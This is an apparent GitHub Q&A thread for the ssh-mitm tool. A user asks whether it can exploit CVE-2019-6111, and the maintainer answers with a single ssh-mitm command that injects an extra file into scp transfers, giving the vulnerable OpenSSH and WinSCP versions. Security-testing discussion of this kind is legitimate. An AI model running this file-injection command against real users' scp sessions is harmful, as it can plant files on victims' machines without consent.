### DISCUSSION TITLE
exploit cve-2019-6111

### DISCUSSION THREAD

**Discussion by BroXEX** [ssh-mitm/ssh-mitm#81] [Q&A] [answered]
hi ,how are you i hope you fine 

please i want to know can this tool exploit  cve-2019-6111 ?

thank you

**Comment by manfred-kaiser** [comment, marked as answer]
You can use following command: 

`ssh-mitm --scp-interface inject_file --scp-inject /path/to/additional/file`

But this only works in OpenSSH <= 7.9 and WinSCP <= 5.13.
If this exploit does not work, check if your distribution has backported the patch.

More information can be found in the docs: https://docs.ssh-mitm.at/CVE-2019-6111.html

**Comment by BroXEX** [comment]
thank you so much ,
iam going to try
